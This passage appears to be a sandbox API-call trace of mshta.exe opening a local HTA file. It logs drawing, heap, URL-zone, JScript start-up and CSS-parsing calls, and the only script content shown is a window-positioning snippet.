nNumerator=0, nDenominator=2) returned 0 [0227.277] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0227.277] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.277] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.277] Polygon (hdc=0xb0101dd, apt=0x1e9ee0, cpt=6) returned 1 [0227.278] SetBrushOrgEx (in: hdc=0xb0101dd, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0227.278] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.278] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0227.278] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0227.278] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0227.278] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.278] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.278] Polygon (hdc=0xb0101dd, apt=0x1e9ee0, cpt=8) returned 1 [0227.278] SetBrushOrgEx (in: hdc=0xb0101dd, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0227.278] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0227.278] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.278] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.278] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.278] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0227.279] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0227.279] Polygon (hdc=0xb0101dd, apt=0x1e9ee0, cpt=6) returned 1 [0227.279] SetBrushOrgEx (in: hdc=0xb0101dd, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0227.279] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0227.279] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.279] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.279] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.279] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0227.279] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0227.279] Polygon (hdc=0xb0101dd, apt=0x1e9ee0, cpt=8) returned 1 [0227.279] SelectObject (hdc=0xb0101dd, h=0x1900010) returned 0x710070a [0227.322] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4c) returned 0x5ce3c0 [0227.323] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5fd748 [0227.323] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5fd688, Size=0x18) returned 0x5fffc0 [0227.323] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4c) returned 0x5ce368 [0227.323] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x800) returned 0x5c92c0 [0227.323] GetTickCount () returned 0x20bd2 [0227.323] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0227.323] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5ce890 [0227.323] ParseURLW (in: pcszURL="file:///C:/info.hta", ppu=0x1ef548 | out: ppu=0x1ef548) returned 0x0 [0227.323] IUnknown:AddRef (This=0x5bc0bc) returned 0x3 [0227.323] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", pdwZone=0x1ef4ec, dwFlags=0x0 | out: pdwZone=0x1ef4ec*=0xffffffff) returned 0x800c0011 [0227.323] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.323] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.323] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0227.323] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", dwAction=0x1400, pPolicy=0x1ef4f0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x1ef4f0*=0x0) returned 0x0 [0227.323] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.323] IUnknown:Release (This=0x5bc0bc) returned 0x2 [0227.323] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5fd748 | out: hHeap=0x590000) returned 1 [0227.323] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5fd6a0, Size=0x18) returned 0x5fffe0 [0227.323] GetTickCount () returned 0x20bd2 [0227.323] GetTickCount () returned 0x20bd2 [0227.323] ParseURLW (in: pcszURL="file:///C:/info.hta", ppu=0x1ef700 | out: ppu=0x1ef700) returned 0x0 [0227.323] IUnknown:AddRef (This=0x5bc0bc) returned 0x3 [0227.323] IUri:GetAbsoluteUri (in: This=0x5bc0bc, pbstrAbsoluteUri=0x1ef780 | out: pbstrAbsoluteUri=0x1ef780*="file:///C:/info.hta") returned 0x0 [0227.323] IUnknown:Release (This=0x5bc0bc) returned 0x2 [0227.324] ShouldShowIntranetWarningSecband () returned 0x0 [0227.340] GetIUriPriv () returned 0x0 [0227.340] IUnknown:Release (This=0x5bc0bc) returned 0x2 [0227.340] GetCursorPos (in: lpPoint=0x1ef578 | out: lpPoint=0x1ef578*(x=449, y=50)) returned 1 [0227.340] ScreenToClient (in: hWnd=0x3016a, lpPoint=0x1ef578 | out: lpPoint=0x1ef578) returned 1 [0227.340] GetKeyState (nVirtKey=16) returned 0 [0227.340] GetKeyState (nVirtKey=17) returned 0 [0227.340] GetKeyState (nVirtKey=18) returned 0 [0227.340] GetKeyState (nVirtKey=160) returned 0 [0227.340] GetKeyState (nVirtKey=162) returned 0 [0227.340] GetKeyState (nVirtKey=164) returned 0 [0227.340] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x30) returned 0x5d8480 [0227.340] GetCurrentThreadId () returned 0x36c [0227.340] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d8480 | out: hHeap=0x590000) returned 1 [0227.340] GetCurrentThreadId () returned 0x36c [0227.340] GetCurrentThreadId () returned 0x36c [0227.340] ParseURLW (in: pcszURL="file:///C:/info.hta", ppu=0x1ef504 | out: ppu=0x1ef504) returned 0x0 [0227.340] IUnknown:AddRef (This=0x5bc0bc) returned 0x3 [0227.340] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", pdwZone=0x1ef4a4, dwFlags=0x0 | out: pdwZone=0x1ef4a4*=0xffffffff) returned 0x800c0011 [0227.341] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.341] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.341] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0227.341] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", dwAction=0x1400, pPolicy=0x1ef4a8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x1ef4a8*=0x0) returned 0x0 [0227.341] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.341] IUnknown:Release (This=0x5bc0bc) returned 0x2 [0227.341] ParseURLW (in: pcszURL="file:///C:/info.hta", ppu=0x1ef494 | out: ppu=0x1ef494) returned 0x0 [0227.341] IUnknown:AddRef (This=0x5bc0bc) returned 0x3 [0227.341] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", pdwZone=0x1ef434, dwFlags=0x0 | out: pdwZone=0x1ef434*=0xffffffff) returned 0x800c0011 [0227.341] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.341] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.341] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0227.341] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", dwAction=0x1400, pPolicy=0x1ef438, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x1ef438*=0x0) returned 0x0 [0227.341] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.341] IUnknown:Release (This=0x5bc0bc) returned 0x2 [0227.341] CoCreateInstance (rclsid=0x1ef484*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x740995b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x1ef440) [0227.626] malloc (_Size=0x80) returned 0x87da18 [0227.626] GetVersion () returned 0x1db10106 [0227.626] __dllonexit () returned 0x73d77ecf [0227.626] __dllonexit () returned 0x73d77e9b [0227.626] __dllonexit () returned 0x73d77eb5 [0227.626] __dllonexit () returned 0x73d77f70 [0227.628] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x763d0000 [0227.628] GetProcAddress (hModule=0x763d0000, lpProcName="RegisterTraceGuidsA") returned 0x76f7848f [0227.628] EtwRegisterTraceGuidsA () returned 0x0 [0227.628] GetProcAddress (hModule=0x763d0000, lpProcName="RegisterTraceGuidsA") returned 0x76f7848f [0227.628] EtwRegisterTraceGuidsA () returned 0x0 [0227.628] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1eddf4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0227.629] GetProcAddress (hModule=0x763d0000, lpProcName="RegOpenKeyExA") returned 0x763e4907 [0227.629] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x1edf18 | out: phkResult=0x1edf18*=0x0) returned 0x2 [0227.632] IUnknown:AddRef (This=0x5bc0bc) returned 0x3 [0227.632] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", pdwZone=0x1ef354, dwFlags=0x0 | out: pdwZone=0x1ef354*=0xffffffff) returned 0x800c0011 [0227.633] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.633] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.633] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0227.633] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", dwAction=0x1401, pPolicy=0x1ef358, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x1ef358*=0x0) returned 0x0 [0227.633] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.633] IUnknown:Release (This=0x5bc0bc) returned 0x2 [0227.634] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x54) returned 0x5dedb0 [0227.634] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5fd7a8 [0227.634] GetCurrentThreadId () returned 0x36c [0227.635] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x1ef220, nSize=0x27 | out: lpBuffer="") returned 0x0 [0227.635] GetCurrentThreadId () returned 0x36c [0227.635] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0227.635] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x1ef290, cchData=6 | out: lpLCData="1252") returned 5 [0227.635] IsValidCodePage (CodePage=0x4e4) returned 1 [0227.635] GetCurrentThreadId () returned 0x36c [0227.635] GetCurrentThreadId () returned 0x36c [0227.635] CoCreateInstance (in: rclsid=0x73d615ec*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x73d615fc*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x29106b4 | out: ppv=0x29106b4*=0x5dc8f8) returned 0x0 [0227.635] IUnknown:AddRef (This=0x5dc8f8) returned 0x2 [0227.635] GetCurrentProcessId () returned 0x124 [0227.635] GetCurrentThreadId () returned 0x36c [0227.635] GetTickCount () returned 0x20c8d [0227.635] ISystemDebugEventFire:BeginSession (This=0x5dc8f8, guidSourceID=0x73d616d4, strSessionName="JScript:00000292:00000876:18134285") returned 0x0 [0227.635] GetCurrentThreadId () returned 0x36c [0227.635] GetCurrentThreadId () returned 0x36c [0227.635] ??2@YAPAXI@Z () returned 0x2910b08 [0227.636] GetCurrentThreadId () returned 0x36c [0227.636] StrCmpICW (pszStr1="window", pszStr2="window") returned 0 [0227.636] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x600000 [0227.636] CoGetObjectContext (in: riid=0x73d60270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1ef1ec | out: ppv=0x1ef1ec*=0x5b66e8) returned 0x0 [0227.637] ??2@YAPAXI@Z () returned 0x2910b40 [0227.637] CGIPTable::RegisterInterfaceInGlobal () returned 0x0 [0227.637] IUnknown:AddRef (This=0x5b66e8) returned 0x2 [0227.637] IUnknown:Release (This=0x5b66e8) returned 0x1 [0227.637] ??2@YAPAXI@Z () returned 0x2910b68 [0227.637] GetTickCount () returned 0x20c8d [0227.637] ??2@YAPAXI@Z () returned 0x29111b8 [0227.637] malloc (_Size=0x40) returned 0x2911228 [0227.637] malloc (_Size=0x104) returned 0x2911270 [0227.637] ??2@YAPAXI@Z () returned 0x2911380 [0227.637] CoGetObjectContext (in: riid=0x73d60270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1ef208 | out: ppv=0x1ef208*=0x5b66e8) returned 0x0 [0227.637] IUnknown:Release (This=0x5b66e8) returned 0x1 [0227.637] CoGetObjectContext (in: riid=0x73d60270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1ef208 | out: ppv=0x1ef208*=0x5b66e8) returned 0x0 [0227.637] IUnknown:Release (This=0x5b66e8) returned 0x1 [0227.637] StrCmpIW (psz1="file:///C:/info.hta", psz2="file:///C:/info.hta") returned 0 [0227.637] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x10) returned 0x5fd7d8 [0227.637] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x6047a8 [0227.637] GetCurrentThreadId () returned 0x36c [0227.637] realloc (_Block=0x0, _Size=0xc8) returned 0x29113a0 [0227.638] _wcsicmp (_String1="", _String2="") returned 0 [0227.638] SysStringLen (param_1="\r\n window.moveTo(50, 50);\r\n window.resizeTo(screen.width - 100, screen.height - 100);\r\n ") returned 0x65 [0227.638] free (_Block=0x2911498) [0227.638] ??3@YAXPAX@Z () returned 0x1 [0227.638] free (_Block=0x8713d0) [0227.638] free (_Block=0x2911ca8) [0227.638] free (_Block=0x2912130) [0227.638] free (_Block=0x2911f20) [0227.638] free (_Block=0x2911e10) [0227.638] ??2@YAPAXI@Z () returned 0x29127c0 [0227.638] ??2@YAPAXI@Z () returned 0x29127f8 [0227.638] malloc (_Size=0xc) returned 0x8713d0 [0227.638] ??2@YAPAXI@Z () returned 0x2912818 [0227.639] CoGetObjectContext (in: riid=0x73d60270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1ef328 | out: ppv=0x1ef328*=0x5b66e8) returned 0x0 [0227.639] IUnknown:Release (This=0x5b66e8) returned 0x1 [0227.639] ??2@YAPAXI@Z () returned 0x2912860 [0227.639] CoGetObjectContext (in: riid=0x73d60270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1ef378 | out: ppv=0x1ef378*=0x5b66e8) returned 0x0 [0227.639] IUnknown:Release (This=0x5b66e8) returned 0x1 [0227.639] ??2@YAPAXI@Z () returned 0x29128d0 [0227.639] ISystemDebugEventFire:IsActive (This=0x5dc8f8) returned 0x1 [0227.639] CoGetObjectContext (in: riid=0x73d60270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1ef374 | out: ppv=0x1ef374*=0x5b66e8) returned 0x0 [0227.639] IUnknown:Release (This=0x5b66e8) returned 0x1 [0227.641] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.641] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.641] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.643] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.643] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.643] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.643] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.643] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.643] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.643] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.643] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.643] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.643] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.643] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.644] GetUpdateRgn (hWnd=0x3016a, hRgn=0x904070b, bErase=0) returned 1 [0227.644] DeleteObject (ho=0x904070b) returned 1 [0227.644] SetWindowPos (hWnd=0x3016a, hWndInsertAfter=0x0, X=0, Y=0, cx=1324, cy=762, uFlags=0x14) returned 1 [0227.644] GetWindowLongW (hWnd=0x3016a, nIndex=-21) returned 6035024 [0227.644] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x5d2410, hWnd=0x3016a, msg=0x46, wParam=0x0, lParam=0x1ee714*=196970, plResult=0x1ee5b0 | out: plResult=0x1ee5b0) returned 0x1 [0227.644] NtdllDefWindowProc_W () returned 0x0 [0227.644] GetCurrentThreadId () returned 0x36c [0227.644] GetWindowLongW (hWnd=0x3016a, nIndex=-21) returned 6035024 [0227.644] GetCurrentThreadId () returned 0x36c [0227.645] NtdllDefWindowProc_W () returned 0x1 [0227.645] GetWindowLongW (hWnd=0x3016a, nIndex=-21) returned 6035024 [0227.645] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x5d2410, hWnd=0x3016a, msg=0x47, wParam=0x0, lParam=0x1ee714*=196970, plResult=0x1ee5ac | out: plResult=0x1ee5ac) returned 0x1 [0227.645] NtdllDefWindowProc_W () returned 0x0 [0227.645] GetWindowLongW (hWnd=0x3016a, nIndex=-21) returned 6035024 [0227.645] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x5d2410, hWnd=0x3016a, msg=0x5, wParam=0x0, lParam=0x2fa052c, plResult=0x1ee1e8 | out: plResult=0x1ee1e8) returned 0x1 [0227.645] NtdllDefWindowProc_W () returned 0x0 [0227.645] GetCurrentThreadId () returned 0x36c [0227.645] GetCurrentThreadId () returned 0x36c [0227.645] GetCurrentThreadId () returned 0x36c [0227.645] NtdllDefWindowProc_W () returned 0x0 [0227.646] NtdllDefWindowProc_W () returned 0x0 [0227.646] NtdllDefWindowProc_W () returned 0x1 [0227.648] ISystemDebugEventFire:IsActive (This=0x5dc8f8) returned 0x1 [0227.648] ??3@YAXPAX@Z () returned 0x1 [0227.648] free (_Block=0x29113a0) [0227.648] GetCurrentThreadId () returned 0x36c [0227.648] GetCurrentThreadId () returned 0x36c [0227.648] GetCurrentThreadId () returned 0x36c [0227.706] StrCmpICW (pszStr1="text/css", pszStr2="text/css") returned 0 [0227.706] ParseURLW (in: pcszURL="file:///C:/info.hta", ppu=0x1eb308 | out: ppu=0x1eb308) returned 0x0 [0227.706] CoInternetCombineUrl (in: pwzBaseUrl="file:///C:/info.hta", pwzRelativeUrl="", dwCombineFlags=0x6000000, pszResult=0x1ed438, cchResult=0x1000, pcchResult=0x1eb384, dwReserved=0x0 | out: pszResult="file:///C:/", pcchResult=0x1eb384) returned 0x0 [0227.706] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x5d3b50 [0227.706] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xf8) returned 0x5fd388 [0227.706] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8b4) returned 0x5f2b40 [0227.706] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5f9ad8 [0227.706] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0227.706] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5f9af0 [0227.706] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.706] IsCharSpaceW (wch=0x20) returned 1 [0227.706] IsCharSpaceW (wch=0x7b) returned 0 [0227.706] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x605058 [0227.706] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5fc5e0 [0227.706] IsCharSpaceW (wch=0x20) returned 1 [0227.706] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.706] IsCharSpaceW (wch=0xd) returned 1 [0227.706] IsCharSpaceW (wch=0xa) returned 1 [0227.706] IsCharSpaceW (wch=0x20) returned 1 [0227.706] IsCharSpaceW (wch=0x20) returned 1 [0227.706] IsCharSpaceW (wch=0x20) returned 1 [0227.706] IsCharSpaceW (wch=0x20) returned 1 [0227.706] IsCharSpaceW (wch=0x20) returned 1 [0227.706] IsCharSpaceW (wch=0x20) returned 1 [0227.706] IsCharSpaceW (wch=0x20) returned 1 [0227.706] IsCharSpaceW (wch=0x20) returned 1 [0227.706] IsCharSpaceW (wch=0x66) returned 0 [0227.707] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5fc5e0 | out: hHeap=0x590000) returned 1 [0227.707] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.707] IsCharSpaceW (wch=0x3a) returned 0 [0227.707] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1c) returned 0x6047f8 [0227.707] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.707] IsCharSpaceW (wch=0x20) returned 1 [0227.707] IsCharSpaceW (wch=0x31) returned 0 [0227.707] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.707] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.707] IsCharSpaceW (wch=0x20) returned 1 [0227.707] IsCharSpaceW (wch=0x54) returned 0 [0227.707] IsCharAlphaNumericW (ch=0x2c) returned 0 [0227.707] IsCharSpaceW (wch=0x2c) returned 0 [0227.707] IsCharAlphaNumericW (ch=0x2c) returned 0 [0227.707] IsCharSpaceW (wch=0x20) returned 1 [0227.707] IsCharSpaceW (wch=0x73) returned 0 [0227.707] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.707] IsCharSpaceW (wch=0x3b) returned 0 [0227.707] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.707] IsCharSpaceW (wch=0xd) returned 1 [0227.707] IsCharSpaceW (wch=0xa) returned 1 [0227.707] IsCharSpaceW (wch=0x20) returned 1 [0227.707] IsCharSpaceW (wch=0x20) returned 1 [0227.707] IsCharSpaceW (wch=0x20) returned 1 [0227.707] IsCharSpaceW (wch=0x20) returned 1 [0227.707] IsCharSpaceW (wch=0x20) returned 1 [0227.707] IsCharSpaceW (wch=0x20) returned 1 [0227.707] IsCharSpaceW (wch=0x20) returned 1 [0227.707] IsCharSpaceW (wch=0x20) returned 1 [0227.707] IsCharSpaceW (wch=0x6d) returned 0 [0227.707] IsCharSpaceW (wch=0x66) returned 0 [0227.707] IsCharSpaceW (wch=0x31) returned 0 [0227.707] bsearch (_Key=0x1ef2ac, _Base=0x740a5220, _NumOfElements=0x9, _SizeOfElements=0x8, _PtFuncCompare=0x74084c66) returned 0x0 [0227.707] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x30) returned 0x5fcb00 [0227.707] IsCharSpaceW (wch=0x31) returned 0 [0227.707] IsCharSpaceW (wch=0x31) returned 0 [0227.707] IsCharSpaceW (wch=0x35) returned 0 [0227.707] IsCharSpaceW (wch=0x70) returned 0 [0227.707] IsCharSpaceW (wch=0x78) returned 0 [0227.707] IsCharSpaceW (wch=0x20) returned 1 [0227.707] IsCharSpaceW (wch=0x31) returned 0 [0227.707] IsCharSpaceW (wch=0x70) returned 0 [0227.708] IsCharSpaceW (wch=0x31) returned 0 [0227.708] IsCharSpaceW (wch=0x70) returned 0 [0227.708] IsCharSpaceW (wch=0x70) returned 0 [0227.708] IsCharSpaceW (wch=0x78) returned 0 [0227.708] IsCharSpaceW (wch=0x0) returned 0 [0227.708] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x605078 [0227.708] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x40) returned 0x5dd1b0 [0227.708] IsCharSpaceW (wch=0x20) returned 1 [0227.708] IsCharSpaceW (wch=0x54) returned 0 [0227.708] IsCharSpaceW (wch=0x6e) returned 0 [0227.708] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x26) returned 0x5f2778 [0227.708] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5dd1b0, Size=0x60) returned 0x5e1cd0 [0227.708] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5fcb00 | out: hHeap=0x590000) returned 1 [0227.708] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.708] IsCharSpaceW (wch=0x3a) returned 0 [0227.708] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.708] IsCharSpaceW (wch=0x20) returned 1 [0227.708] IsCharSpaceW (wch=0x31) returned 0 [0227.708] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.708] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.708] IsCharSpaceW (wch=0x3b) returned 0 [0227.708] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.708] IsCharSpaceW (wch=0xd) returned 1 [0227.708] IsCharSpaceW (wch=0xa) returned 1 [0227.708] IsCharSpaceW (wch=0x20) returned 1 [0227.708] IsCharSpaceW (wch=0x20) returned 1 [0227.708] IsCharSpaceW (wch=0x20) returned 1 [0227.708] IsCharSpaceW (wch=0x20) returned 1 [0227.708] IsCharSpaceW (wch=0x20) returned 1 [0227.708] IsCharSpaceW (wch=0x20) returned 1 [0227.708] IsCharSpaceW (wch=0x20) returned 1 [0227.708] IsCharSpaceW (wch=0x20) returned 1 [0227.708] IsCharSpaceW (wch=0x6c) returned 0 [0227.709] IsCharSpaceW (wch=0x78) returned 0 [0227.709] IsCharSpaceW (wch=0x31) returned 0 [0227.709] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xa) returned 0x5f9b08 [0227.709] IsCharSpaceW (wch=0x31) returned 0 [0227.709] IsCharSpaceW (wch=0x31) returned 0 [0227.709] IsCharSpaceW (wch=0x30) returned 0 [0227.709] IsCharSpaceW (wch=0x70) returned 0 [0227.709] IsCharSpaceW (wch=0x78) returned 0 [0227.709] IsCharSpaceW (wch=0x31) returned 0 [0227.709] 